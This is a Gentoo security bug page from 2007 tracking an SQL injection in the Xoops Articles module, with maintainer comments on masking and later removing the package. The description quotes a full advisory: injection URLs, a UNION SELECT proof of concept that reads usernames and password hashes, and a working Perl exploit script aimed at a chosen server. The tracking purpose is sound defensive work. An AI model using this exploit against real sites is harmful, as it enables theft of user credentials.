Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 172525 - www-apps/xoops security status
Summary: www-apps/xoops security status
Status: RESOLVED WONTFIX
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High enhancement (vote)
Assignee: Gentoo Security
URL: http://www.securityfocus.com/archive/...
Whiteboard: ? [masked]
Keywords:
Depends on:
Blocks: 211166
  Show dependency tree
 
Reported: 2007-03-28 07:56 UTC by Sune Kloppenborg Jeppesen (RETIRED)
Modified: 2009-11-23 17:52 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-03-28 07:56:03 UTC
Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC
 
 Type :
 
 SQL Injection
 
 Release Date :
 
 {2007-03-26}
 
 Product / Vendor :
 
 Xoops Portal
 
 http://www.Xoops.Org
 
 Bug :
 
 http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0
 
 PoC :
 
 http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELE
 CT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,N
 ULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1
 /*
 
 Exploit :
 
 #!/usr/bin/perl -w
 
 #############################################
 #Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
 #############################################
 
 use IO::Socket;
 
 if (@ARGV != 3)
 {
 print "\n-----------------------------------\n";
 print "Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit\n";
 print "-----------------------------------\n";
 print "\nUniquE-Key{UniquE-Cracker}\n";
 print "UniquE[at]UniquE-Key.ORG\n";
 print "http://UniquE-Key.ORG\n";
 print "\n-----------------------------------\n";
 print "\nUsage: $0 <server> <path> <uid>\n";
 print "Examp: $0 www.victim.com /path 1\n";
 print "\n-----------------------------------\n";
 exit ();
 }
 
 $server = $ARGV[0];
 $path = $ARGV[1];
 $uid = $ARGV[2];
 
 $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
 printf $socket ("GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,
 NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
 LL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
 $path,$server,$uid);
 
 while(<$socket>)
 
 {
 if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
 }
 
 Tested :
 
 All Version
 
 Author :
 
 UniquE-Key{UniquE-Cracker}
 UniquE(at)UniquE-Key.Org
 http://www.UniquE-Key.Org
Comment 1 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-03-30 20:08:45 UTC
web-apps please advise.
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-05-20 07:23:17 UTC
web-apps please advise.
Comment 3 Renat Lumpau (RETIRED) gentoo-dev 2007-05-28 00:58:46 UTC
Feel free to mask it. In light of bug #170005 and the discussion at the URL therein, I'd rather wait for upstream to sort out their plans.
Comment 4 Gunnar Wrobel (RETIRED) gentoo-dev 2007-08-15 07:10:56 UTC
rl03 is right. No clean up/downgrade possible. So I masked the package. We'll wait for xoops-2.3. 
Comment 5 Pierre-Yves Rofes (RETIRED) gentoo-dev 2007-08-24 11:49:31 UTC
setting status to enhancement, and waiting for upstream.
Comment 6 Gunnar Wrobel (RETIRED) gentoo-dev 2007-10-30 14:20:40 UTC
Changing title since this is another package we hard masked until upstream is able to fix it
Comment 7 Alex Legler (RETIRED) archtester gentoo-dev Security 2009-11-23 17:52:12 UTC
package will be removed